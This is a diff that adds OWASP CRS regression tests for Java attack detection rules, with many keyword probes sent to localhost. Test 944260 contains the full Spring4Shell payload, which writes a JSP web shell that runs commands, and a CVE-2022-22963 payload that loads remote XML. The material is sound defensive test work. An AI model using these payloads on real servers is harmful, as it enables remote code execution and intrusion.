"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-68 + desc: "Argument name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-69 + desc: "Cookie test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-70 + desc: "Cookie name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-71 + desc: "Request header test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-72 + desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-73 + desc: "XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-74 + desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-75 + desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-76 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-77 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-78 + desc: "Argument test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-79 + desc: "Argument name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-80 + desc: "Cookie test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-81 + desc: "Cookie name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-82 + desc: "Request header test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-83 + desc: "XML attribute value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-84 + desc: "XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-85 + desc: "Nested XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-86 + desc: "Content-Type text/plain includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-87 + desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-88 + desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml new file mode 100644 index 00000000..abca823e --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -0,0 +1,431 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944250.yaml" + description: "Positive tests for rule 944250" +tests: + - test_title: 944250-1 + desc: "Argument test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-2 + desc: "Argument name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-3 + desc: "Cookie test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-4 + desc: "Cookie name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-5 + desc: "Request header test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-6 + desc: "XML attribute value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-7 + desc: "XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-8 + desc: "Nested XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-9 + desc: "Content-Type text/plain includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-10 + desc: "Content-Type application/json arg value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-11 + desc: "Content-Type application/json arg name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-12 + desc: "Argument test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-13 + desc: "Argument name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-14 + desc: "Cookie test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-15 + desc: "Cookie name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-16 + desc: "Request header test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-17 + desc: "XML attribute value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-18 + desc: "XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-19 + desc: "Nested XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-20 + desc: "Content-Type text/plain includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-21 + desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-22 + desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log_contains: "id \"944250\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml new file mode 100644 index 00000000..664061d1 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "theMiddle" + enabled: true + name: "944260.yaml" + description: "Positive tests for rule 944260" +tests: + - test_title: 944260-1 + desc: "CVE-2022-22963" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log_contains: "id \"944260\"" + - test_title: 944260-2 + desc: "Spring Framework RCE" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log_contains: "id \"944260\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml new file mode 100644 index 00000000..4106730f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -0,0 +1,6367 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944300.yaml" + description: "Positive tests for rule 944300" +tests: + - test_title: 944300-1 + desc: "Argument test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-2 + desc: "Argument name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-3 + desc: "Cookie test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-4 + desc: "Cookie name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-5 